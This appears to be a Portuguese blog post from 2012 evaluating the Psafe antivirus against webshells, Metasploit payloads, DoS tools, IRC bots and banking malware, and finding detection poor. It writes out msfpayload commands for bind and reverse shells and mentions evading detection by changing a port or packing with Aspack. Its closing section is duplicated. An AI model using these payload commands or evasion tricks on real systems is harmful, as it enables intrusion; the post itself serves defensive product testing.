O Psafe Protege mesmo?
Bem, inicialmente gostaria de dizer que esta pesquisa em momento algum quis comparar o Psafe com qualquer outro AV. do mercado.
Detalhe da pesquisa:
Sistema Operacional utilizado: Windows 2003 Server R2
AV: Psafe Protege
Software Adicional: IIS6 (Apenas para testes com webshells)
Abaixo a tabela com os testes realizados:
| Webshells | Encoding | Extensao alterada | Detecção na gravação? | Detecção na execução? | Detecção Manual Scan? | |||
| ASP | Texto Plano | Não | Não | Não | Não | |||
| ASPX | Texto Plano | Não | Não | Não | Não | |||
| JSP | Texto Plano | Não | Não | Não | Não | |||
| Perl | Texto Plano | Não | Não | Não | Não | |||
| PHP | Texto Plano | Não | Não | Não | Não | |||
| CFM | Texto Plano | Não | Não | Não | Não | |||
| Executaveis MetaSploit | Encoding | Extensao alterada | Detecção na gravação? | Detecção na execução? | Detecção Manual Scan? | Comando: | ||
| Sample1 Bind na porta 6666 | Não | Não | Não | Não | Não | msfpayload windows/shell_bind_tcp LPORT=6666 X > /tmp/msf_sample1.exe | ||
| Sample 2 Reverse Shell porta 6666 | Não | Não | Não | Não | Não | msfpayload windows/shell_reverse_tcp LHOST=172.16.0.1 LPORT=6666 X > /tmp/msf_sample2.exe | ||
| Sample 3 Arbitrary Command Exec | Não | Não | Não | Não | Não | msfpayload windows/exec CMD=calc.exe X > /tmp/msf_sample3.exe | ||
| Ferramentas para DoS | Encoding | Extensao alterada | Detecção na gravação? | Detecção na execução? | Detecção Manual Scan? | |||
| SlowLoris | Texto Plano | Não | Não | Não | Não | |||
| Loic | Texto Plano | Não | Não | Não | Não | |||
| IRC Bots (Perl) | Encoding | Extensao alterada | Detecção na gravação? | Detecção na execução? | Detecção Manual Scan? | |||
| AlphaNix 2.0 | Texto Plano | Não | Não | Não | Não | |||
| Scane | Texto Plano | Não | Não | Não | Não | |||
| Sexi | Texto Plano | Não | Não | Não | Não | |||
| Shellbot | Texto Plano | Não | Não | Não | Não | |||
| Samples EICAR.org | Packing | Extensao alterada | Detecção na gravação? | Detecção na execução? | Detecção Manual Scan? | |||
| eicar.com | Não | Não | Não | Não | Sim | |||
| eicar.com.txt | Não | Sim | Não | N \ A | Sim | |||
| eicar_com.zip | Não | Compactado | Não | N \ A | Não | |||
| eicarcom2.zip | Não | Compactado | Não | N \ A | Não | |||
Os teste foram realizados entre os dias 06 e 07 de agosto, 2012.
No dia 06 o sample1 do MetaSploit não tinha sido encontrado, já no dia, 07 ele foi encontrado(Trojan.Generic) e removido, porém, somente com manual scan. Os binários gerados no Metasploit ao serem executados abriram portas, realizaram conexões com a internet e executaram comandos e mesmo assim não geraram alertar algum do Psafe. Outro problema grande foi que após a detecção do msf_sample1.exe, geramos novamente, porém, alterando a porta para 6667 e não foi detectado.
Testamos vários malwares voltados a roubo de senhas bancárias e afins, o índice de detecção foi baixo. Dos 35 samples analisados, apenas 7 foram detectados.
Dos detectados, utilizamos o que possui assinatura: HEUR/Malware.QVM20.Gen para mais alguns testes:
- Não foi detectado na gravação.
- Foi detectado mesmo trocando a extensão.
Ao utilizarmos um compactador de binários simples (Aspack) o malware parou de ser dectado no Scan manual e foi removido apenas o .bak gerado pelo Aspack.
Outro ponto importante, não há verificação de endereços Web maliciosos, durante a pesquisa visitamos vários sites conhecidos por distribuição de malwares e nenhum alerta foi gerado.
Conclusão:
O AV se mostrou ineficaz em seu propósito, apresentando um baixo índice de detecção de malwares, especialmente os mais populares no Brasil que permitem o acesso a contas bancárias e podem gerar prejuízos diversos para a maioria dos usuários da Internet no País.
O fato é agravado pela empresa posicionar o seu produto como “o único antivírus completo e totalmente gratuito que existe, podendo levar o usuário doméstico a entender que existe um nível de perfeição quando comparado aos concorrentes, algo que não corresponde a realidade obtida nos testes realizados.
---------------------------------------------------------------------------------------------------------
Esta pesquisa foi feita em conjunto com Gabriel Lanzi (Psylon) @gmlnet
Gostaria de agradecer ao Fio (@fiocavallari @BrauvonHacker ) pela ajuda com os Samples e ao amigo Lincoln Werneck (@lincolnwerneck) do Instituto Coaliza (@Coaliza) na redação deste post.
No dia 06 o sample1 do MetaSploit não tinha sido encontrado, já no dia, 07 ele foi encontrado(Trojan.Generic) e removido, porém, somente com manual scan. Os binários gerados no Metasploit ao serem executados abriram portas, realizaram conexões com a internet e executaram comandos e mesmo assim não geraram alertar algum do Psafe. Outro problema grande foi que após a detecção do msf_sample1.exe, geramos novamente, porém, alterando a porta para 6667 e não foi detectado.
Testamos vários malwares voltados a roubo de senhas bancárias e afins, o índice de detecção foi baixo. Dos 35 samples analisados, apenas 7 foram detectados.
Dos detectados, utilizamos o que possui assinatura: HEUR/Malware.QVM20.Gen para mais alguns testes:
- Não foi detectado na gravação.
- Foi detectado mesmo trocando a extensão.
Ao utilizarmos um compactador de binários simples (Aspack) o malware parou de ser dectado no Scan manual e foi removido apenas o .bak gerado pelo Aspack.
Outro ponto importante, não há verificação de endereços Web maliciosos, durante a pesquisa visitamos vários sites conhecidos por distribuição de malwares e nenhum alerta foi gerado.
Conclusão:
O AV se mostrou ineficaz em seu propósito, apresentando um baixo índice de detecção de malwares, especialmente os mais populares no Brasil que permitem o acesso a contas bancárias e podem gerar prejuízos diversos para a maioria dos usuários da Internet no País.
O fato é agravado pela empresa posicionar o seu produto como “o único antivírus completo e totalmente gratuito que existe, podendo levar o usuário doméstico a entender que existe um nível de perfeição quando comparado aos concorrentes, algo que não corresponde a realidade obtida nos testes realizados.
---------------------------------------------------------------------------------------------------------
Esta pesquisa foi feita em conjunto com Gabriel Lanzi (Psylon) @gmlnet
Gostaria de agradecer ao Fio (@fiocavallari @BrauvonHacker ) pela ajuda com os Samples e ao amigo Lincoln Werneck (@lincolnwerneck) do Instituto Coaliza (@Coaliza) na redação deste post.
